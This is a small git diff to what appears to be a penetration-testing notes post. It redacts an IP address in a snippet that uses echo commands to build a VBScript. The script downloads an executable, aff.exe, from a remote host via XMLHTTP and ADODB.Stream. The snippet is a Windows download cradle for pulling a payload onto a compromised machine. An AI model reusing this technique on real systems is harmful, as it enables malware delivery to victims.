--- a/_posts/2018-01-30-pen.md
+++ b/_posts/2018-01-30-pen.md
@@ -6761,7 +6761,7 @@ http://payloads.online/archivers/2017-11-08/1
 ```
 echo Set Post = CreateObject("Msxml2.XMLHTTP")  >> D:\2.vbs
 echo Set Shell = CreateObject("Wscript.Shell") >> D:\2.vbs
-echo Post.Open "GET","http://118.190.200.77/aff.exe",0 >> D:\2.vbs
+echo Post.Open "GET","http://*******/aff.exe",0 >> D:\2.vbs
 echo Post.Send() >> D:\2.vbs
 echo Set aGet = CreateObject("ADODB.Stream") >> D:\2.vbs
 echo aGet.Mode = 3 >> D:\2.vbs
